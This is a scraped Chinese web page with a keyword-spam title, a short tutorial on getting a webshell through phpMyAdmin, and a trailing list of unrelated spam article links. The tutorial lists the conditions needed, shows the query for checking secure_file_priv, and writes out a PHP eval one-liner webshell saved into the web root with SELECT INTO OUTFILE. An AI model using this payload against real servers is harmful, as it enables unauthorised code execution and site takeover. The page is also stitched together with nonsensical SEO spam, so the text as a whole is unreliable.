当前位置: 首页 > news >正文

常用来做网站首业的是上海网络推广需要多少

常用来做网站首业的是,上海网络推广需要多少,网站seo优化技能,wordpress页面静态化0x00 前言 来到phpmyadmin页面后如何getshell呢?下面介绍两种方法 0x01 select into outfile直接写入 1、利用条件 对web目录需要有写权限能够使用单引号(root) 知道网站绝对路径(phpinfo/php探针/通过报错等) secure_file_priv没有具体值 2、查看secure_file…

0x00 前言

来到phpmyadmin页面后如何getshell呢?下面介绍两种方法

0x01 select into outfile直接写入

1、利用条件

  • 对web目录需要有写权限能够使用单引号(root)

  • 知道网站绝对路径(phpinfo/php探针/通过报错等)

  • secure_file_priv没有具体值

2、查看secure_file_priv值

show global variables like '%secure%';

关于secure_file_priv配置介绍:

secure_file_priv 是用来限制 load dumpfile、into outfile、load_file() 函数在哪个目录下拥有上传或者读取文件的权限

当 secure_file_priv 的值为 NULL ,表示限制 mysqld 不允许导入|导出,此时无法提权
当 secure_file_priv 的值为 /tmp/ ,表示限制 mysqld 的导入|导出只能发生在 /tmp/ 目录下,此时也无法提权
当 secure_file_priv 的值没有具体值时,表示不对 mysqld 的导入|导出做限制,此时可提权

我这里的secure_file_priv值为NULL,所以不能够导入或导出

secure_file_priv这个值是只读变量,只能通过配置文件修改。如果管理员没有配置,那么我们是无法进行写入shell的,这里我为了测试能否写入修改一下

在MySQL的配置文件my.ini中进行配置:

修改后secure_file_priv的值如图所示:

3、写入一句话

select '<?php @eval($POST[1]); ?>' INTO OUTFILE 'D:\\phpStudy\\PHPTutorial\\WWW\\a.php'

这里需要注意的一个点是路径需要用"\\"

查看下根目录

http://www.yayakq.cn/news/709370/

相关文章:

  • 闵行区 网站制作做网站用什么软件方便
  • 网站转移权重企业网站cms 系统
  • 做网站都需要哪些软件深圳网站制作服
  • c语言精品网站开发的教学wordpress 天气
  • 广东省建设厅网站手机上怎么做投票网站
  • 宁波网站建设培训学校网站建设图片上传
  • 石家庄网站制作软件3gcms企业手机网站整站源码asp
  • 深圳网站建设公司推荐WordPress内容整合
  • 乐从网站制作网页视频下载到电脑
  • 网站开发的流程编程课程收费标准
  • apache建设本地网站附近网站建设公司哪家好
  • 河南周口东宇网站建设中国化工建设协会网站
  • 天津雍鑫建设投资集团网站深圳网站设计排名
  • 上海营销型网站设计润滑油网站怎样做效果更好
  • 做网站有弹窗叫什么柳城网站
  • 广州网站开发外包餐厅设计
  • 往公众号里放网站怎么做制作微信小程序需要什么技术
  • 织梦商业网站内容管理系统linux版网站开发
  • 小说网站 做百度联盟网站开发现在什么软件好
  • 如何实现网站的快速排名网站的费用可以做无形资产
  • 像素点建网站wordpress文件调用函数
  • 怎么用ps做网站图片小型购物网站
  • 如何修改网站主页黄页网页的推广网站
  • 接私活 做网站邢台发广告的平台有哪些
  • 网站建设详细需求文档怎么制作网页步骤
  • iis中浏览网站是什么销售类网站开发架构
  • 网站规划的主要任务是什么营销型企业网站建设应遵守的原则
  • 南京制作网站企业江苏同隆建设集团有限公司网站
  • 哈尔滨 建设网站 科技app外包网站
  • 上海松一网站建设页面模板不包括